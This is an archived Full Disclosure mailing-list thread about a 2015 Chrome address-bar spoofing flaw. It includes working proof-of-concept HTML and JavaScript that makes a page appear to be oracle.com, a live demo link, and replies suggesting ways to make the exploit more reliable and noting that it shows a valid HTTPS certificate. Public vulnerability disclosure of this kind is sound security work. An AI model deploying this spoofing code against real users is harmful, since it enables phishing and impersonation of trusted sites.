[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [FD] Google Chrome Address Spoofing (Request For Comment)
- To: Mustafa Al-Bassam <mus@xxxxxxxxxxxx>
- Subject: Re: [FD] Google Chrome Address Spoofing (Request For Comment)
- From: Daniel Wood <daniel.wood@xxxxxxxxx>
- Date: Thu, 2 Jul 2015 19:17:20 -0400
Yes this is a pretty good find. I can also confirm it works on iOS 8.3 (12F69)
with Safari.
DW
Sent from my iPad
> On Jul 2, 2015, at 9:33 AM, Mustafa Al-Bassam <mus@xxxxxxxxxxxx> wrote:
>
> That's pretty neat. Played around with this and made a few discoveries.
>
> 1. It shows a valid certificate when you spoof HTTPS sites. That's really
> bad. POC/screenshot: https://github.com/musalbas/address-spoofing-poc
>
> 2. The page isn't responsive when using this flaw. That means you can't spoof
> a login box for example. (I tried.)
>
> 3. The success of the exploit seems to depend on if the browser can start
> loading content.html fast enough. I noticed that the exploit works 100% of
> the time when used locally. Perhaps a better version of the exploit would
> somehow preload content.html - for example by opening a window with an URL
> that starts with javascript: followed by a script to display the content?
> That, or perhaps reducing the interval time for trying to run next() after
> the popup is created.
>
> I wonder if this works on any other browsers?
>
> MustafaOn 30 Jun 2015 7:08 am, David Leo <david.leo@xxxxxxxxxxxx> wrote:
>>
>> Impact:
>> The "click to verify" thing is completely broken...
>> Anyone can be "BBB Accredited Business" etc.
>> You can make whitehouse.gov display "We love Islamic State" :-)
>>
>> Note:
>> No user interaction on the fake page.
>>
>> Code:
>> ***** index.html
>> <script>
>> function next()
>> {
>> w.location.replace('http://www.oracle.com/index.html?'+n);n++;
>> setTimeout("next();",15);
>> setTimeout("next();",25);
>> }
>> function f()
>> {
>> w=window.open("content.html","_blank","width=500 height=500");
>> i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);
>>
>> }
>> </script>
>> <a href="#" onclick="f()">Go</a><br>
>> ***** content.html
>> <b>This web page is NOT oracle.com</b>
>> <script>location="http://www.oracle.com/index.html";;</script>
>> ***** It's online
>> http://www.deusen.co.uk/items/gwhere.6128645971389012/
>> (The page says "June/16/2015" - it works as we tested today)
>>
>> Request For Comment:
>> We reported this to Google.
>> They reproduced, and say
>> It's DoS which doesn't matter.
>> We think it's very strange,
>> since the browser does not crash(not DoS),
>> and the threat is obvious.
>> What's your opinion?
>>
>> Kind Regards,
>>
>> PS
>> We love clever tricks.
>> We love this:
>> http://dieyu.org/
>>
>>
>> _______________________________________________
>> Sent through the Full Disclosure mailing list
>> https://nmap.org/mailman/listinfo/fulldisclosure
>> Web Archives & RSS: http://seclists.org/fulldisclosure/
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/